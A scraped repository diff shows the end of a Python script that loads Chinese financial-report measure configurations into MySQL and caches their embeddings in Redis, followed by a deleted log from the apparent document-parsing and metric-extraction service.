# f"报告期末长期借款,{year}年3月31日长期借款合计",
# f"上年年末总资产,{int(year)-1}年12月31日资产",
# f"上年年末总资产,{int(year)-1}年12月31日资产总计",
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金",
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金合计",
# f"上年年末存货,{int(year)-1}年12月31日存货",
# f"上年年末存货,{int(year)-1}年12月31日存货合计",
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产",
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产合计",
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程",
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程合计",
# f"上年年末商誉,{int(year)-1}年12月31日商誉",
# f"上年年末商誉,{int(year)-1}年12月31日商誉合计",
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款",
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款合计",
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债",
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债合计",
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款",
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款合计",
]
# 打印每一行
for line in lines:
config_list = line.strip().split(',')
measure = config_list[0]
ori_measure = config_list[1]
ori_measure_id = utils.get_md5(ori_measure)
# 判断数据库中是否有数据
cursor.execute(check_query)
check_records = cursor.fetchall()
if any(record[0] == ori_measure_id for record in check_records):
continue
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
cursor.execute(insert_query, data_to_insert)
conn.commit()
def insert_measure_vector(conn,cursor,table_name):
from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
# 执行SQL语句更新数据
select_query = f'''
SELECT ori_measure_id,ori_measure_name FROM {table_name}
'''
cursor.execute(select_query)
records = cursor.fetchall()
print(f"总计{len(records)}条数据")
for record in records:
if redis_client.hexists('measure_config', record[0]):
measure_vector = redis_client.hget('measure_config', record[0])
else:
print('新增指标',record[1])
vector_obj = utils.embed_with_str(record[1])
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
redis_client.hset('measure_config', record[0], measure_vector)
redis_client.close()
conn.close()
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
if __name__ == "__main__":
#需要先清空本地数据库的 measure_create_config 和 measure_create_period 表
# process_excel_and_db(
# 'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
# 'F:\\11_pdf\\period_1.xlsx',#period文件
# 'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
# )
from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
conn = mysql.connector.connect(
host=MYSQL_HOST_APP,
user=MYSQL_USER_APP,
password=MYSQL_PASSWORD_APP,
database=MYSQL_DB_APP
)
cursor = conn.cursor()
#file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
# 更新第一季度的measure_vector
table_name = 'measure_config_first_quarter'
# 写入mysql
# measure_config_to_db(conn, cursor, table_name)
create_new_config(conn, cursor, table_name,'2024','2025')
# 插入redies
insert_measure_vector(conn,cursor,table_name)

View File

@ -1,204 +0,0 @@
2024-12-29 16:13:29,975|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:13:36,106|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:15:16,205|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:15:22,356|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:17:15,693|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=5
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:17:25,319|zzb_logger : INFO text任务ID:201917
2024-12-29 16:17:26,701|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (5116)...
2024-12-29 16:17:28,173|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (22268)...
2024-12-29 16:17:29,591|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (27736)...
2024-12-29 16:17:30,937|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38276)...
2024-12-29 16:17:32,294|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38292)...
2024-12-29 16:17:33,664|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38240)...
2024-12-29 16:17:35,153|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (28536)...
2024-12-29 16:17:36,559|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37552)...
2024-12-29 16:17:37,929|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37856)...
2024-12-29 16:17:39,291|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (10528)...
2024-12-29 16:17:40,688|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (31444)...
2024-12-29 16:17:42,133|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (11108)...
2024-12-29 16:17:43,518|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23236)...
2024-12-29 16:17:44,901|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23572)...
2024-12-29 16:17:46,495|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (39604)...
2024-12-29 16:17:47,899|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (4076)...
2024-12-29 16:17:47,899|zzb_logger : INFO 等待所有子任务完成任务ID:201917
2024-12-29 16:18:02,194|zzb_logger : INFO word表格中 text解析完成任务ID:201917
2024-12-29 16:18:02,196|zzb_logger : INFO 开始解析word表表格中的table任务ID:201917
2024-12-29 16:18:03,525|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36176)...
2024-12-29 16:18:04,585|zzb_logger : INFO Task 解析表格201917 runs 1.06 seconds.
2024-12-29 16:18:04,873|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35368)...
2024-12-29 16:18:05,769|zzb_logger : INFO Task 解析表格201917 runs 0.90 seconds.
2024-12-29 16:18:06,263|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (33004)...
2024-12-29 16:18:07,225|zzb_logger : INFO Task 解析表格201917 runs 0.96 seconds.
2024-12-29 16:18:07,628|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (30764)...
2024-12-29 16:18:08,427|zzb_logger : INFO Task 解析表格201917 runs 0.80 seconds.
2024-12-29 16:18:08,976|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (29608)...
2024-12-29 16:18:09,864|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:10,588|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (5404)...
2024-12-29 16:18:11,360|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:11,966|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36200)...
2024-12-29 16:18:12,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36328)...
2024-12-29 16:18:12,892|zzb_logger : INFO Task 解析表格201917 runs 0.93 seconds.
2024-12-29 16:18:13,034|zzb_logger : INFO Task 解析表格201917 runs 1.00 seconds.
2024-12-29 16:18:13,392|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39712)...
2024-12-29 16:18:14,166|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:15,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (17184)...
2024-12-29 16:18:15,084|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38828)...
2024-12-29 16:18:15,156|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39596)...
2024-12-29 16:18:15,194|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36908)...
2024-12-29 16:18:15,268|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38088)...
2024-12-29 16:18:15,273|zzb_logger : INFO 解析表格时出现了异常 setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (8,) + inhomogeneous part. 内容为{'type': 'table', 'index': 1438, 'data': [['项目', '期末', '期末', '期末', '期末', '期末', '期初', '期初', '期初', '期初', '期初', '期初', '期初', '期初'], ['', '账面余额', '账面价值', '受限类型', '受限情况', '受限情况', '账面余额', '账面余额', '账面价值', '账面价值', '受限类型', '受限类型', '受限情况', ''], ['货币资金', '485,532.72', '485,532.72', '', '住房专用基金', '住房专用基金', '482,151.75', '482,151.75', '482,151.75', '482,151.75', '', '', '住房专用基金', ''], ['固定资产', '9,798,299.46', '9,798,299.46', '', '金融机构借款抵押', '3,747,470.09', '3,747,470.09', '3,747,470.09', '3,747,470.09', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['无形资产', '7,982,261.87', '7,982,261.87', '', '金融机构借款抵押', '5,437,462.92', '5,437,462.92', '5,437,462.92', '5,437,462.92', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['货币资金', '43,997,452.57', '43,997,452.57', '', '银行保证金', '63,388,483.00', '63,388,483.00', '63,388,483.00', '63,388,483.00', '', '', '银行保证金', '银行保证金'], ['投资性房地产', '62,041,831.52', '62,041,831.52', '', '金融机构借款抵押', '67,653,392.10', '67,653,392.10', '67,653,392.10', '67,653,392.10', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['合计', '124,305,378.14', '124,305,378.14', '', '', '140,708,959.86', '140,708,959.86', '140,708,959.86', '140,708,959.86', '', '', '', '']]}
2024-12-29 16:18:15,722|zzb_logger : INFO Task 解析表格201917 runs 0.69 seconds.
2024-12-29 16:18:15,873|zzb_logger : INFO Task 解析表格201917 runs 0.79 seconds.
2024-12-29 16:18:16,067|zzb_logger : INFO Task 解析表格201917 runs 0.91 seconds.
2024-12-29 16:18:16,086|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,158|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,787|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39052)...
2024-12-29 16:18:16,847|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35928)...
2024-12-29 16:18:17,456|zzb_logger : INFO Task 解析表格201917 runs 0.61 seconds.
2024-12-29 16:18:17,644|zzb_logger : INFO Task 解析表格201917 runs 0.86 seconds.
2024-12-29 16:18:17,819|zzb_logger : INFO word表格中 table解析完成任务ID:201917
2024-12-29 16:18:17,985|zzb_logger : INFO 解析任务 201917 完成耗时62.29 秒。
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=6
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:18:18,107|zzb_logger : INFO 开始表格指标抽取任务ID:201917
2024-12-29 16:18:20,187|zzb_logger : INFO 提取指标任务 0-10 (29656)...
2024-12-29 16:18:21,575|zzb_logger : INFO 提取指标任务 10-20 (38952)...
2024-12-29 16:18:22,849|zzb_logger : INFO 提取指标任务 20-30 (31900)...
2024-12-29 16:18:24,192|zzb_logger : INFO 提取指标任务 30-40 (30420)...
2024-12-29 16:18:25,554|zzb_logger : INFO 提取指标任务 40-50 (32448)...
2024-12-29 16:18:26,909|zzb_logger : INFO 提取指标任务 50-60 (37708)...
2024-12-29 16:18:28,305|zzb_logger : INFO 提取指标任务 60-70 (36136)...
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,936|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:29,637|zzb_logger : INFO 提取指标任务 70-80 (39120)...
2024-12-29 16:18:42,814|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:46,511|zzb_logger : INFO 提取指标 40-50 runs 20.96 seconds.
2024-12-29 16:18:54,027|zzb_logger : INFO 提取指标 70-80 runs 24.39 seconds.
2024-12-29 16:19:17,236|zzb_logger : INFO 提取指标 60-70 runs 48.93 seconds.
2024-12-29 16:19:20,151|zzb_logger : INFO 提取指标 30-40 runs 55.96 seconds.
2024-12-29 16:19:40,383|zzb_logger : INFO 提取指标 50-60 runs 73.47 seconds.
2024-12-29 16:20:06,573|zzb_logger : INFO 提取指标 0-10 runs 106.39 seconds.
2024-12-29 16:20:44,937|zzb_logger : INFO 提取指标 10-20 runs 143.36 seconds.
2024-12-29 16:20:50,959|zzb_logger : INFO 提取指标 20-30 runs 148.11 seconds.
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取完成任务ID:201917
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取 201917 完成耗时153.23 秒。
2024-12-29 16:20:51,337|zzb_logger : INFO 启动这个指标归一化任务ID-修改测试:201917
2024-12-29 16:20:51,549|zzb_logger : INFO 目录黑名单为:[]
2024-12-29 16:20:52,316|zzb_logger : INFO 向量配置数据查询 0.11 秒。
2024-12-29 16:20:52,317|zzb_logger : INFO insert_table_measure_from_vector_async_process方法走的半年报
2024-12-29 16:20:54,191|zzb_logger : INFO Run task 0-351 (41216)...
2024-12-29 16:20:54,192|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:54,742|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:55,664|zzb_logger : INFO Run task 351-702 (16388)...
2024-12-29 16:20:55,664|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:56,152|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:57,120|zzb_logger : INFO Run task 702-1053 (41796)...
2024-12-29 16:20:57,120|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:57,611|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:58,818|zzb_logger : INFO Run task 1053-1404 (39320)...
2024-12-29 16:20:58,818|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:59,324|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:00,159|zzb_logger : INFO Run task 1404-1755 (41868)...
2024-12-29 16:21:00,159|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:00,887|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:01,473|zzb_logger : INFO Run task 1755-2106 (26816)...
2024-12-29 16:21:01,473|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:02,171|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:02,832|zzb_logger : INFO Run task 2106-2457 (32120)...
2024-12-29 16:21:02,832|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:03,703|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', 